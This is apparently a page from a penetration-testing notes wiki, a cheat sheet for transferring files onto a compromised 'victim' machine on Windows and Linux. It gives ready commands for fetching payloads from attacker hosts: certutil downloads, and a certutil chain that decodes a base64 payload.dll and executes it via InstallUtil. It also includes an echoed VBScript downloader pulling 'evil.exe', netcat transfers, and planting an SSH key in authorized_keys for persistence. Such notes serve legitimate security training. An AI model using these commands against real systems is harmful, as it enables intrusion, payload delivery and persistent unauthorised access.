Downloading/Transfer files

Download files to the victim machine

Simple Local Web Servers

Command

Description

python -m SimpleHTTPServer 80

Run a basic http server, great for serving up shells etc

python3 -m http.server

Run a basic Python3 http server, great for serving up shells etc

ruby -rwebrick -e "WEBrick::HTTPServer.new

(:Port => 80, :DocumentRoot => Dir.pwd).start"

Run a ruby webrick basic http server

php -S 0.0.0.0:80

Run a basic PHP http server

Updog

Link: https://github.com/sc0tfree/updog

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.

Install using pip:

pip3 install updog

Usage

updog [-d DIRECTORY] [-p PORT] [--password PASSWORD] [--ssl]

SMTP Server

Link: https://github.com/hackerscrolls/simplesmtp

Usage: go run simplesmtp.go -save -i 0.0.0.0 -p 25

Windows

curl

Since Win10 1809 there is a build in curl

C:\Users\IEUser>curl.exe 
curl: try 'curl --help' for more information 
C:\Users\IEUser>curl.exe google.com/robots.txt 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>301 Moved Permanently</title> 
</head><body> 
<h1>Moved Permanently</h1> 
<p>The document has moved <a href="http://www.google.com/robots.txt">here</a>.</p> 
<hr> 
</body></html> 
C:\Users\IEUser>

wget

Wget is alias to Invoke-WebRequest in powershell

PS C:\Users\Idan> wget google.com/robots.txt


StatusCode        : 200
StatusDescription : OK
Content           : User-agent: *
                    Disallow: /search
                    Allow: /search/about
                    Allow: /search/static
                    Allow: /search/howsearchworks
                    Disallow: /sdch
                    Disallow: /groups
                    Disallow: /index.html?
                    Disallow: /?
                    Allow: /?hl=
                    Disallow: /?...
RawContent        : HTTP/1.1 200 OK
                    Vary: Accept-Encoding
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 0
                    Alt-Svc: quic=":443"; ma=2592000; v="46,43",h3-Q050=":443"; ma=2592000,h3-Q049=":443";
                    ma=2592000,h3-Q048=...
Forms             : {}
Headers           : {[Vary, Accept-Encoding], [X-Content-Type-Options, nosniff], [X-XSS-Protection, 0], [Alt-Svc,
                    quic=":443"; ma=2592000; v="46,43",h3-Q050=":443"; ma=2592000,h3-Q049=":443";
                    ma=2592000,h3-Q048=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443";
                    ma=2592000,h3-T050=":443"; ma=2592000]...}
Images            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 7004

View just content:

Invoke-WebRequest 'http://google.com/robots.txt' | Select-Object -Expand Content

PS iwr

alias to Invoke-WebRequest

iwr google.com/robots.txt

bitsadmin

Use bitsadmin to download via the command line on older version of windows (works from CMD.exe)

usage:

cmd.exe /c bitsadmin /transfer {JOB NAME} /download /priority normal {LINK} {DOWNLOAD LOCATION}

example:

bitsadmin /transfer debjob /download /priority normal http://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-8.7.1-i386-xfce-desktop.iso D:\Users\[Username]\Downloads\debian-live-8.7.1-i386-xfce-desktop.iso

credit: https://gist.github.com/rosswd/cad64650ca1b03bd1789a69edbeb586c

PS WebClient

(new-object System.Net.WebClient).DownloadFile('http://www.xyz.net/file.txt','C:\tmp\file.txt')

Certutil

You can download the file directly:

certutil.exe -urlcache -f http://192.168.0.1/file.exe file.exe

Or you can encode the file in base64 and then use certutil to decode it.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

FTP

On a linux host start a FTP:

apt-get install python3-pyftpdlib  
python3 -m pyftpdlib -p 21 -w

Or use metasploit:

msf > use auxiliary/server/ftp

Write to the file the commands on the victim:

echo open 192.168.1.101 21> ftp.txt
echo USER N7WERA>> ftp.txt
echo NEWERA_PASSWORD>> ftp.txt
echo bin>> ftp.txt
echo GET winpease.exe>> ftp.txt
echo bye>> ftp.txt

run from cmd or powershell:

ftp -s ftp.txt

SMB Server

Start smb server on Kali (or any linux) using impacket:

root@kali# smbserver.py -smb2support {SHARE NAME} {FOLDER TO SHARE} -username newera -password newera

From the victim:

C:\>net use \\10.11.0.XXX\smb /user:<username> <password>
The command completed successfully.

Copy files:

C:\WINDOWS\Temp>copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe 
copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe 
        1 file(s) copied.

TFTP Server

Start TFTP on Kali:

service atftpd start
atftpd --daemon --port 69 /tftp

Download files from the victim:

tftp -i 192.168.0.1 GET winpeas.txt

VBScript

Here is a good script to make a wget-clone in VB.

If it doesn't work try piping it through unix2dos before copying it.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

You then execute the script like this:

cscript wget.vbs http://192.168.10.5/evil.exe evil.exe

NC.exe

You can download a standalone compiled version of NC (Netcat) for windows from the nmap project (https://svn.nmap.org/nmap/ncat/), or use the kali compiled version, located in:

/usr/share/windows-binaries/nc.exe

If you're able to move the ncat to the victim you can use the normal nc functions to transfer more files (or gain a shell..)

On the attacker host:

nc 192.168.0.10 4444 < file.exe

On the victim:

ncat.exe -lvp 4444 > file.exe

Linux

scp

A built in SSH utility to trasfer files. once you gained access to the victim you can add a your pulic key to .ssh/authorized_keys or use credentials if found

Using public/private key - once a public key was copied to the victim .ssh folder, you can transfer files from the attacker to the victim by running:

scp file.exe -i id_rsa user@victim:/tmp/

The file will be transferred to the /tmp folder.

If you gained crednetials remove the -i id_rsa and login with the same command as above.

wget

wget is used to download files to the victim, run a web sever on the attacker by running:

python3 -m http.server

and download from the victim:

wget 192.168.0.1:8080/linenum.sh

curl

Curl is used to view web server source code, we can download files by running

 curl https://url -o output.file.name

ftp

linux has a build in ftp utility, first created a listerner on the attacker host:

apt-get install python-pyftpdlib  
python -m pyftpdlib -p 21 -w

Or use metasploit:

msf > use auxiliary/server/ftp

and then connect from the victim using

ftp 192.168.0.1

nc

A lot of unix systems have a build in nc utility which can be used to transfer files, same way as in windows.

You can download a compiled version of nc to unix from:

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat

PreviousPort knocking NextRemote Desktop

Last updated 3 years ago